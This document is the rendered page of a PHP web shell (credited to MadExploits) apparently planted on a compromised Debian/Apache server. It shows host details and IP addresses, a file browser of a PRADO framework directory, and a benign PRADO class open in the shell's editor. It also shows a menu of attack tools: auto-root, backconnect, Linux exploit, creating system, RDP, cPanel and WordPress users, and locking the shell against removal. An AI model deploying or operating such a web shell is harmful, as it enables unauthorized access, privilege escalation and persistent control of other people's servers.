Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.138.101.51
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
ifk /
web /
prado4.3.2 /
Data /
[ HOME SHELL ]
Name
Size
Permission
Action
ActiveRecord
[ DIR ]
drwxr-xr-x
Common
[ DIR ]
drwxr-xr-x
DataGateway
[ DIR ]
drwxr-xr-x
SqlMap
[ DIR ]
drwxr-xr-x
TDataSourceConfig.php
4.6
KB
-rw-r--r--
TDbColumnCaseMode.php
659
B
-rw-r--r--
TDbCommand.php
9.62
KB
-rw-r--r--
TDbConnection.php
16.68
KB
-rw-r--r--
TDbDataReader.php
6.18
KB
-rw-r--r--
TDbNullConversionMode.php
688
B
-rw-r--r--
TDbTransaction.php
2.46
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : TDbColumnCaseMode.php
<?php /** * TDbConnection class file * * @author Qiang Xue <qiang.xue@gmail.com> * @link https://github.com/pradosoft/prado * @license https://github.com/pradosoft/prado/blob/master/LICENSE */ namespace Prado\Data; /** * TDbColumnCaseMode * * @author Qiang Xue <qiang.xue@gmail.com> * @since 3.0 */ class TDbColumnCaseMode extends \Prado\TEnumerable { /** * Column name cases are kept as is from the database */ public const Preserved = 'Preserved'; /** * Column names are converted to lower case */ public const LowerCase = 'LowerCase'; /** * Column names are converted to upper case */ public const UpperCase = 'UpperCase'; }
Close